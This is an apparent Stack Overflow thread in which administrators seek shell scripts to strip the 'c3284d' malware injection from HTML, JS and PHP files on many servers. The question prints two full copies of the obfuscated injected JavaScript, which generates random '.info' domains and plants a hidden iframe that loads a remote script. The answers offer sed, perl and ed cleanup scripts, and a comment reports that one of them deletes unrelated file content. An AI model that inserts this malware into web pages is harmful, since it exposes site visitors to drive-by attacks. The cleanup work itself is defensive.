# Clean server infected with c3284d malware, using shell script

Tags: bash, shell

We have around 11 servers for a total of roughly 1500 sites infected with the c3284d malware. We want to do a shell script to replace all the code which appears to have hit html, js, and php files. They also planted a file called "p" in the user's home folder which contains a larger version of the malware.

We came across a few suggestions for find/replace but they don't appear to work for us, or we just don''t know how to do it properly.

Here's what we have so far:

```
 for FILE in $(grep -H -r -l "c3284d" /home)
 do
      sed -i '/c3284d/d;/bVPbjpswEP2WWuoK/d' ${FILE}
 done
```

This only deletes the signature of "c3284d" and not the junk that was inserted. Can someone help to fix this to erase this mess from the files. The "c3284d" usually appears on it's own line, but not always, and starts and ends with it.

Here's a few examples of what we are seeing:

```
<!--c3284d--><script>function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var var9=7;var9++;return nib}var6-=9;var var10=6;var10++;var var12=0.0102;if(var12!=5){var var11=0.021;var11--}var var1='OpulenmH'.substr(3,3);var var14=0.012;if(var14!=null){var var13=12;var13-=0.0027}var1+='Msgthln'.substr(2,3);var var16=8439;if(var16<0.0142){var var15=5943;var15+=0.007}var var5=40;function lar(rad,tsk,dud){var var17=13;var17++;var var18=13;var18-=0.0199;return tsk}var5+=22;var var19=0.021;var var4='CyqfromxB'.substr(3,4);var var20=0.0058;var20++;var var22=0.0179;if(var22!=null){var var21=23;var21--}var4+='zsCharAR'.substr(2,4);var var23=0.0435;var23--;var4+='XDoCodeWm'.substr(3,4);function lug(cod){var var26=0.0038;if(var26!=26){var var24=0.037;var24+=24;var var25=2702}var var31=5244;if(var31<0.0085){var var27='voADrb8a1';var var30=5099;if(var30!=6){var var28=0.0233;var28++;var var29=null}}return cod}var var3='sF68indeOu'.substr(4,4);var var34=3367;if(var34!=0.0246){var var32=0.0089;var32++;var var33='cut'}var3+='Tq4xOfAk'.substr(3,3);var var36=0.0101;if(var36>25){var var35=0.0071;var35+=3169}var var38=13;if(var38==0){var var37=5;var37+=3684}var sux='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';var var39=0;do{var var40=4847;var40+=29;var var41=26;var41++;var39++}while(var39<7);var var42=0.0239;var42-=16;var ret='';function jot(few,hyp){var var43=null;var43-=0.0021;return hyp}var ext='';var var44=1250;var44++;var var45=0.0034;var45+=6258;var sh=0;var var46=7594;var46++;var var47=3240;var47--;var len=str[var1];var var49=3026;if(var49!=null){var var48=0.004;var48-=20}for(var cnt1=0;cnt1<len;cnt1++){var var50=14;var50+=0.013;sh+=shift;var var51=6;var51++;var var52=0.0193;var52++;var ch=str[var2](cnt1,1);var var53=0;do{var var55=7261;if(var55!=null){var var54=16;var54+=14}var var58=1404;if(var58>17){var var56=[10,0,50,30,40,20];var var57=5412;var57++}var53++}while(var53<8);var pos=sux[var3](ch);var var59=0.0262;var59++;pos+=sh;var var60=6;var60+=6;pos%=var5;for(var var61=0;var61<10;var61++){var var62=21;var62++;var var63=4887;var63-=4113}ret+=sux[var2](pos,1);var var66=0.062;if(var66>22){var var64=0;var64+=3831;var var65=0.013;var65-=11}var var67=0.0122;var67-=3665}var var68=0.017;var68++;var var69=null;var69-=0.0069;for(var cnt2=0;cnt2<len;cnt2+=2){function tub(uke,dun){var var70=0;do{var var73=5314;if(var73!=4129){var var71=0;var71+=0.0322;var var72=false}var70++}while(var70<7);var var74=0.0238;var74-=6514;return uke}var var75=17;var75-=21;var ch=ret[var2](cnt2,2);function cue(ton){var var78=0.003;if(var78==28){var var76=0;var76+=7;var var77=0.0089;var77--}return ton}var ich=parseInt(ch,var6);var var79=0;while(var79<7){var var81=6374;if(var81!=0.0126){var var80=0.003;var80+=1176}var79++}ext+=String[var4](ich);function gun(sub,vug){var var82=0.005;var82--;var var83=null;return sub}var var84=10;var84--}function ree(ban,set){var var89=0.0136;if(var89<0){var var86=11;if(var86<4930){var var85=0;var85-=4954}var var88=5;if(var88<0){var var87=8525;var87--}}return ban}return ext}var var3=0;var3-=6479;for(var var4=0;var4<10;var4++){var var5=7;var5+=26}function ulu(){var hi,test,lo;function bid(pah){var var9=0.0011;if(var9==19){var var7=1393;if(var7==0.017){var var3=19;if(var3==null){var var2=7;if(var2!=3669){var var1=[21,42,28,0,35,7,14]}}var var6=0.005;if(var6!=5605){var var4=0.028;var4-=10;var var5=0.0145;var5+=0.004}}var var8=['the','eft','mas']}return pah}var var10=18;var10--;var var11=5110;var11--;var var14=0.014;if(var14==null){var var12=1537;var12--;var var13=0.012;var13--}var hi=this.seed/this.Q;function cos(wag){var var15='hum';var var16=['teg','yod'];return wag}function yew(tat){var var17=0.0109;var17-=3465;return tat}    var lo=this.seed%this.Q;function dee(pht,oxy){for(var var18=0;var18<4;var18++){var var22=0.0152;if(var22==null){var var20=3229;if(var20>14){var var19=1941}var var21='zh4pMCYB'}}return oxy}var var25=5109;if(var25>4261){var var23=0;var var24='mho'}    var test=this.A*lo-this.R*hi;var var26=0.011;var26-=7383;    if(test>0){var var27=null;var27-=2995;for(var var28=0;var28<8;var28++){var var30=0.0056;if(var30!=19){var var29=0;var29+=0.013}var var31=26;var31++}        this.seed=test;var var32=0;while(var32<4){var var33=27;var33--;var32++}var var35=2510;if(var35<null){var var34='lwxSFm8TI'}}else{var var38=8;if(var38==29){var var36=0.017;var36--;var var37=13;var37--}var var39=2605;        this.seed=test+this.M;var var40=25;var40-=5704;var var41={wit:2288}}var var42=0.018;var42-=0.0047;    return(this.seed*this.oneOverM)}var var6=null;var6-=6649;var var8=2139;if(var8!=0.0176){var var7=10;var7++}function jig(unix){var s,var1,d,var3,var2;function lac(net,dam,sap){var var11=29;if(var11!=5171){var var6=0.002;if(var6<15){var var4=20;var4-=8;var var5=0.035;var5--}var var10=11;if(var10==2581){var var8=18;if(var8>10){var var7=null;var7-=2355}var var9=10;var9++}}return net}var var3=4775;var var13=30;if(var13<23){var var12=9;var12++}var var14=0;do{var var15=0.0147;var var16=0;var14++}while(var14<7);var3-=680;var var19=8044;if(var19==0.0096){var var17=0.0015;var17-=0.009;var var18=22;var18++}var var20={pix:['pip','tor','lob']};var var2=120523;var var23=0.029;if(var23<4713){var var21=6;var21--;var var22=0.004;var22++}var var24=2304;var24--;var2-=54988;var var25=false;var var26=4364;var26++;var var1=17722082;var var27=true;var1-=944867;var var28='den';var d=new Date(unix*1000);var var29=null;var29-=13;    var s=Math.ceil(d.getHours()/3);function feu(fas,cry){var var31=5835;if(var31==0){var var30=2916}return fas}    this.seed=2345678901+(d.getMonth()*var1)+(d.getDate()*var2)+(Math.round(s*var3));var var33=0.008;if(var33>9){var var32=0.009;var32-=2790}    this.A=48271;var var34=5222;var34+=1338;    this.M=2147483647;var var35={top:['sue','ras']};    this.Q=this.M/this.A;var var36='pjNgzb';    this.R=this.M%this.A;var var37=7112;var37--;    this.oneOverM=1.0/this.M;var var38=0;do{var var39=5708;var39++;var var41=9;if(var41==0.007){var var40=3570;var40++}var38++}while(var38<3);    this.next=ulu;var var43=16;if(var43==7569){var var42=1355}var var44=false;    return this}var var11=18;if(var11==0){var var9=0.006;var var10=30;var10--}function hot(dub,jut){var var12='FtjKdH6DTi';var var13=28;var13++;return dub}function bum(r,Min,Max){function arc(vac,hat){var var1=13;var1+=6807;return hat}var var2=0.031;var2--;return Math.round((Max-Min)*r.next()+Min)}var var14=0;do{var var15=['pit','men'];var var16=0;var14++}while(var14<4);function dap(unix,length,zone){var i,rand,letters,str;var var1=0;do{var var2=7902;var1++}while(var1<4);var var3=1574;var3++;var var4=0;do{var var5=5140;var5+=0.007;var var6=null;var6-=0.0061;var4++}while(var4<6);function lap(eth,wyn){var var7=0.002;var7--;return wyn}var rand=new jig(unix);var var10=0.0204;if(var10>8){var var8=0.01;var var9=0.0068}    var letters='qmahgwctopfjilrfpjrfcwgewheizwdw'.split('');var var11=8091;var var12=['del','rec','jam'];    var str='';var var19=22;if(var19!=8632){var var15=24;if(var15>0.0187){var var13=4820;var13-=14;var var14=4205;var14--}var var18=7248;if(var18!=null){var var16=0.0077;var16+=8095;var var17=3411;var17--}}for(var i=0; i<length; i++){var var20='yjVL6qKWtZ';        str+=letters[bum(rand, 0, letters.length-1)];var var21={gob:28}}function bar(dey,fay){var var22=0.0039;var22-=7259;var var24=23;if(var24==0){var var23='tab'}return dey}var var25='UhRKMl5V';    return str+'.'+zone}for(var var17=0;var17<3;var17++){var var18=['how','tar'];var var19=0;var19-=5692}var var20=0;do{var var21=6868;var21++;var var22=0.002;var22++;var20++}while(var20<7);setInterval(function(){var var23=4845;var var24=0.0149;var24++;    try{var var27=10;if(var27>null){var var25=0.011;var25--;var var26=0.025;var26+=0.003}        if(typeof iframeWasCreated=='undefined'){var var28=0.016;var28+=7624;var var29=12;            var unix=Math.round(+new Date()/1000);var var30=0.0044;var30+=0.007;            var domainName=dap(unix, 16, 'info');var var31=29;var31+=5759;            ifrm=document.createElement('i'+'frame'); function roe(mae,you,bam){var var32=0;do{var var33=[18,45,27,9,36,0];var32++}while(var32<6);var var34=7886;return bam}            ifrm.setAttribute('src', 'http://'+domainName+'/in.cgi?14'); var var35='je5Bx_40z';            ifrm.style.width='10px'; var var36=4376;var36+=2797;            ifrm.style.height='10px'; var var37=7287;var37--;function nor(lop){var var38={dig:4393};return lop}            ifrm.style.visibility='hidden'; var var41=17;if(var41>1540){var var39=[0,18,12,6];var var40=12;var40+=0.016}            document.body.appendChild(ifrm);var var43=0.0437;if(var43==0.0087){var var42=0.002}var var44=2082;var44-=0.0189;iframeWasCreated=true;var var45=false}var var48=0.008;if(var48==7526){var var46=8527;var46--;var var47=5186;var47--}for(var var49=0;var49<8;var49++){var var50=false}}catch(e){iframeWasCreated=undefined}var var51=0.0135;var51+=1355;var var52=0.0019;var52++}, 100);</script><!--/c3284d-->

/*c3284d*/
function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var var9=7;var9++;return nib}var6-=9;var var10=6;var10++;var var12=0.0102;if(var12!=5){var var11=0.021;var11--}var var1='OpulenmH'.substr(3,3);var var14=0.012;if(var14!=null){var var13=12;var13-=0.0027}var1+='Msgthln'.substr(2,3);var var16=8439;if(var16<0.0142){var var15=5943;var15+=0.007}var var5=40;function lar(rad,tsk,dud){var var17=13;var17++;var var18=13;var18-=0.0199;return tsk}var5+=22;var var19=0.021;var var4='CyqfromxB'.substr(3,4);var var20=0.0058;var20++;var var22=0.0179;if(var22!=null){var var21=23;var21--}var4+='zsCharAR'.substr(2,4);var var23=0.0435;var23--;var4+='XDoCodeWm'.substr(3,4);function lug(cod){var var26=0.0038;if(var26!=26){var var24=0.037;var24+=24;var var25=2702}var var31=5244;if(var31<0.0085){var var27='voADrb8a1';var var30=5099;if(var30!=6){var var28=0.0233;var28++;var var29=null}}return cod}var var3='sF68indeOu'.substr(4,4);var var34=3367;if(var34!=0.0246){var var32=0.0089;var32++;var var33='cut'}var3+='Tq4xOfAk'.substr(3,3);var var36=0.0101;if(var36>25){var var35=0.0071;var35+=3169}var var38=13;if(var38==0){var var37=5;var37+=3684}var sux='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';var var39=0;do{var var40=4847;var40+=29;var var41=26;var41++;var39++}while(var39<7);var var42=0.0239;var42-=16;var ret='';function jot(few,hyp){var var43=null;var43-=0.0021;return hyp}var ext='';var var44=1250;var44++;var var45=0.0034;var45+=6258;var sh=0;var var46=7594;var46++;var var47=3240;var47--;var len=str[var1];var var49=3026;if(var49!=null){var var48=0.004;var48-=20}for(var cnt1=0;cnt1<len;cnt1++){var var50=14;var50+=0.013;sh+=shift;var var51=6;var51++;var var52=0.0193;var52++;var ch=str[var2](cnt1,1);var var53=0;do{var var55=7261;if(var55!=null){var var54=16;var54+=14}var var58=1404;if(var58>17){var var56=[10,0,50,30,40,20];var var57=5412;var57++}var53++}while(var53<8);var pos=sux[var3](ch);var var59=0.0262;var59++;pos+=sh;var var60=6;var60+=6;pos%=var5;for(var var61=0;var61<10;var61++){var var62=21;var62++;var var63=4887;var63-=4113}ret+=sux[var2](pos,1);var var66=0.062;if(var66>22){var var64=0;var64+=3831;var var65=0.013;var65-=11}var var67=0.0122;var67-=3665}var var68=0.017;var68++;var var69=null;var69-=0.0069;for(var cnt2=0;cnt2<len;cnt2+=2){function tub(uke,dun){var var70=0;do{var var73=5314;if(var73!=4129){var var71=0;var71+=0.0322;var var72=false}var70++}while(var70<7);var var74=0.0238;var74-=6514;return uke}var var75=17;var75-=21;var ch=ret[var2](cnt2,2);function cue(ton){var var78=0.003;if(var78==28){var var76=0;var76+=7;var var77=0.0089;var77--}return ton}var ich=parseInt(ch,var6);var var79=0;while(var79<7){var var81=6374;if(var81!=0.0126){var var80=0.003;var80+=1176}var79++}ext+=String[var4](ich);function gun(sub,vug){var var82=0.005;var82--;var var83=null;return sub}var var84=10;var84--}function ree(ban,set){var var89=0.0136;if(var89<0){var var86=11;if(var86<4930){var var85=0;var85-=4954}var var88=5;if(var88<0){var var87=8525;var87--}}return ban}return ext}var var3=0;var3-=6479;for(var var4=0;var4<10;var4++){var var5=7;var5+=26}function ulu(){var hi,test,lo;function bid(pah){var var9=0.0011;if(var9==19){var var7=1393;if(var7==0.017){var var3=19;if(var3==null){var var2=7;if(var2!=3669){var var1=[21,42,28,0,35,7,14]}}var var6=0.005;if(var6!=5605){var var4=0.028;var4-=10;var var5=0.0145;var5+=0.004}}var var8=['the','eft','mas']}return pah}var var10=18;var10--;var var11=5110;var11--;var var14=0.014;if(var14==null){var var12=1537;var12--;var var13=0.012;var13--}var hi=this.seed/this.Q;function cos(wag){var var15='hum';var var16=['teg','yod'];return wag}function yew(tat){var var17=0.0109;var17-=3465;return tat}    var lo=this.seed%this.Q;function dee(pht,oxy){for(var var18=0;var18<4;var18++){var var22=0.0152;if(var22==null){var var20=3229;if(var20>14){var var19=1941}var var21='zh4pMCYB'}}return oxy}var var25=5109;if(var25>4261){var var23=0;var var24='mho'}    var test=this.A*lo-this.R*hi;var var26=0.011;var26-=7383;    if(test>0){var var27=null;var27-=2995;for(var var28=0;var28<8;var28++){var var30=0.0056;if(var30!=19){var var29=0;var29+=0.013}var var31=26;var31++}        this.seed=test;var var32=0;while(var32<4){var var33=27;var33--;var32++}var var35=2510;if(var35<null){var var34='lwxSFm8TI'}}else{var var38=8;if(var38==29){var var36=0.017;var36--;var var37=13;var37--}var var39=2605;        this.seed=test+this.M;var var40=25;var40-=5704;var var41={wit:2288}}var var42=0.018;var42-=0.0047;    return(this.seed*this.oneOverM)}var var6=null;var6-=6649;var var8=2139;if(var8!=0.0176){var var7=10;var7++}function jig(unix){var s,var1,d,var3,var2;function lac(net,dam,sap){var var11=29;if(var11!=5171){var var6=0.002;if(var6<15){var var4=20;var4-=8;var var5=0.035;var5--}var var10=11;if(var10==2581){var var8=18;if(var8>10){var var7=null;var7-=2355}var var9=10;var9++}}return net}var var3=4775;var var13=30;if(var13<23){var var12=9;var12++}var var14=0;do{var var15=0.0147;var var16=0;var14++}while(var14<7);var3-=680;var var19=8044;if(var19==0.0096){var var17=0.0015;var17-=0.009;var var18=22;var18++}var var20={pix:['pip','tor','lob']};var var2=120523;var var23=0.029;if(var23<4713){var var21=6;var21--;var var22=0.004;var22++}var var24=2304;var24--;var2-=54988;var var25=false;var var26=4364;var26++;var var1=17722082;var var27=true;var1-=944867;var var28='den';var d=new Date(unix*1000);var var29=null;var29-=13;    var s=Math.ceil(d.getHours()/3);function feu(fas,cry){var var31=5835;if(var31==0){var var30=2916}return fas}    this.seed=2345678901+(d.getMonth()*var1)+(d.getDate()*var2)+(Math.round(s*var3));var var33=0.008;if(var33>9){var var32=0.009;var32-=2790}    this.A=48271;var var34=5222;var34+=1338;    this.M=2147483647;var var35={top:['sue','ras']};    this.Q=this.M/this.A;var var36='pjNgzb';    this.R=this.M%this.A;var var37=7112;var37--;    this.oneOverM=1.0/this.M;var var38=0;do{var var39=5708;var39++;var var41=9;if(var41==0.007){var var40=3570;var40++}var38++}while(var38<3);    this.next=ulu;var var43=16;if(var43==7569){var var42=1355}var var44=false;    return this}var var11=18;if(var11==0){var var9=0.006;var var10=30;var10--}function hot(dub,jut){var var12='FtjKdH6DTi';var var13=28;var13++;return dub}function bum(r,Min,Max){function arc(vac,hat){var var1=13;var1+=6807;return hat}var var2=0.031;var2--;return Math.round((Max-Min)*r.next()+Min)}var var14=0;do{var var15=['pit','men'];var var16=0;var14++}while(var14<4);function dap(unix,length,zone){var i,rand,letters,str;var var1=0;do{var var2=7902;var1++}while(var1<4);var var3=1574;var3++;var var4=0;do{var var5=5140;var5+=0.007;var var6=null;var6-=0.0061;var4++}while(var4<6);function lap(eth,wyn){var var7=0.002;var7--;return wyn}var rand=new jig(unix);var var10=0.0204;if(var10>8){var var8=0.01;var var9=0.0068}    var letters='qmahgwctopfjilrfpjrfcwgewheizwdw'.split('');var var11=8091;var var12=['del','rec','jam'];    var str='';var var19=22;if(var19!=8632){var var15=24;if(var15>0.0187){var var13=4820;var13-=14;var var14=4205;var14--}var var18=7248;if(var18!=null){var var16=0.0077;var16+=8095;var var17=3411;var17--}}for(var i=0; i<length; i++){var var20='yjVL6qKWtZ';        str+=letters[bum(rand, 0, letters.length-1)];var var21={gob:28}}function bar(dey,fay){var var22=0.0039;var22-=7259;var var24=23;if(var24==0){var var23='tab'}return dey}var var25='UhRKMl5V';    return str+'.'+zone}for(var var17=0;var17<3;var17++){var var18=['how','tar'];var var19=0;var19-=5692}var var20=0;do{var var21=6868;var21++;var var22=0.002;var22++;var20++}while(var20<7);setInterval(function(){var var23=4845;var var24=0.0149;var24++;    try{var var27=10;if(var27>null){var var25=0.011;var25--;var var26=0.025;var26+=0.003}        if(typeof iframeWasCreated=='undefined'){var var28=0.016;var28+=7624;var var29=12;            var unix=Math.round(+new Date()/1000);var var30=0.0044;var30+=0.007;            var domainName=dap(unix, 16, 'info');var var31=29;var31+=5759;            ifrm=document.createElement('i'+'frame'); function roe(mae,you,bam){var var32=0;do{var var33=[18,45,27,9,36,0];var32++}while(var32<6);var var34=7886;return bam}            ifrm.setAttribute('src', 'http://'+domainName+'/in.cgi?14'); var var35='je5Bx_40z';            ifrm.style.width='10px'; var var36=4376;var36+=2797;            ifrm.style.height='10px'; var var37=7287;var37--;function nor(lop){var var38={dig:4393};return lop}            ifrm.style.visibility='hidden'; var var41=17;if(var41>1540){var var39=[0,18,12,6];var var40=12;var40+=0.016}            document.body.appendChild(ifrm);var var43=0.0437;if(var43==0.0087){var var42=0.002}var var44=2082;var44-=0.0189;iframeWasCreated=true;var var45=false}var var48=0.008;if(var48==7526){var var46=8527;var46--;var var47=5186;var47--}for(var var49=0;var49<8;var49++){var var50=false}}catch(e){iframeWasCreated=undefined}var var51=0.0135;var51+=1355;var var52=0.0019;var52++}, 100);
/*/c3284d*/
```

Comment: I personally would simply print out the file names of the files that seem to be infected, and try to clean them up by hand (which is a pain, I know). Automating the removal of this kind of thing, however, seems like a very dangerous endeavor...

Comment: possible duplicate of [Clean server infected with c3284d virus, using search and replace](http://stackoverflow.com/questions/11490744/clean-server-infected-with-c3284d-virus-using-search-and-replace)

Answer (score 0, accepted):

well in 2 stages this is achievable

in above example there was 2 occurances ? for 2 delit is called 3 times (to catch last instance of it) how ever many instances + 1 times delit needs to be called within the bottom of for loop

```
cd webpath;
grep -r c3284d *|awk -F":" '{print $1}'|grep -v fix.sh|sort|uniq > infected.txt
./fix.sh infected.txt
```

this is all the files in infected.txt now fixed
this is actual scipt 
fixit.sh

```
    #!/bin/bash                                                                                                                                                                                                                                                                    

inputfile=$1;                                                                                                                                                                                                                                                                  
pattern1='c3284d';                                                                                                                                                                                                                                                             
pattern2='c3284e';                                                                                                                                                                                                                                                             

function addreturn() {                                                                                                                                                                                                                                                         

        in1="<!--c3284d-->"                                                                                                                                                                                                                                                    
out1="                                                                                                                                                                                                                                                                         
c3284d                                                                                                                                                                                                                                                                         
";                                                                                                                                                                                                                                                                             
        in=$in1 out=$out1 perl -pi.nk -e 's/\Q$ENV{"in"}/$ENV{"out"}/g' $file                                                                                                                                                                                                  



        in1="<!--/c3284d-->"                                                                                                                                                                                                                                                   
out1="                                                                                                                                                                                                                                                                         
c3284d                                                                                                                                                                                                                                                                         
";                                                                                                                                                                                                                                                                             
        in=$in1 out=$out1 perl -pi.nk -e 's/\Q$ENV{"in"}/$ENV{"out"}/g' $file                                                                                                                                                                                                  




        in1="/*c3284d*/"                                                                                                                                                                                                                                                       
out1="
c3284e
";
        in=$in1 out=$out1 perl -pi.nk -e 's/\Q$ENV{"in"}/$ENV{"out"}/g' $file 

in1="/*/c3284d*/"
out1="
c3284e
";
        in=$in1 out=$out1 perl -pi.nk -e 's/\Q$ENV{"in"}/$ENV{"out"}/g' $file


}

function delit ()  {
        echo "Working on $file"
        delids=`egrep -n "($pattern)" $file|awk -F":" '{print $1}'|tr "\n" " "`
        echo $delids;
        delarray=( $delids )
        val1=${delarray[0]}
        val2=${delarray[1]}
        if [ "$val2" == "" ]; then
                val2=`expr $val1 + 1`
        fi
        doit=$val1","$val2"d"

ed -s $file << EOF
$doit
.
w
q
EOF

}

for file in `cat $inputfile`
do
        addreturn;
        pattern=$pattern1
        delit;
        pattern=$pattern2;
        delit;
done
```

**E2A - WARNING this is using ed to find the line numbers of instances and then actually edit file live and remove between the lines so please backup your content before attempting this**

**16th Sunday**

I tested the old script again this time I put text withineach of the cp3842 and found it was removing text or content between the first call and second call.

Script has now been updated above, I have done some replacing of the tags and inserted extra carriage returns, the reason content between first call 2nd call went missing was due to me doing a -- on val2. This now splits first chunk as original id, the second chunk as cp384e changes d to e then does a delit twice depending on pattern.

This does work I have tested it

```
$ cp ../test1.pp ./
$ grep -n c3284d test1.pp |awk '{print $1}'
3:<!--c3284d--><script>function
8:/*c3284d*/
10:/*/c3284d*/
$ grep -n AAA test1.pp
1:AAAAAAAAAAAAAAAA
2:AAAAAAAAAAAAAAA
$ grep -n BBB test1.pp
5:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
6:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
$ grep -n CCC test1.pp
11:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
12:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
$ ./fix1.sh infected.txt 
Working on test1.pp
4 6

Working on test1.pp
10 14

$ grep -n c3284d test1.pp |awk '{print $1}'
$ grep -n AAA test1.pp
1:AAAAAAAAAAAAAAAA
2:AAAAAAAAAAAAAAA
$ grep -n BBB test1.pp
6:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
7:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
$ grep -n CCC test1.pp
11:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
12:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
$
```

Comment: Thanks, haven't tried it yet but looks like it should do the trick!

Comment: cool ;) well a good test is to store one entry in your infected.txt and run the script against it and see its results before proceeding with all files. but do make sure u tar up folder before starting any of it

Comment: sorry dude - i was thinking about that -- and knew if there was something in the middle of first/second  chunk it would probably go missing. Anyhow 100% sure this new script should do the trick

Answer (score 0):

You could remove all the lines between the occurrences of `c3284d`:

```
find /home -type f -exec sed -i '/c3284d/,/c3284d/ d' {} \;
```

This will not only remove the lines containing `c3284d`, but also the lines between them.

Comment: Looks like this actually deletes everything else in the file after the occurrence of c3284d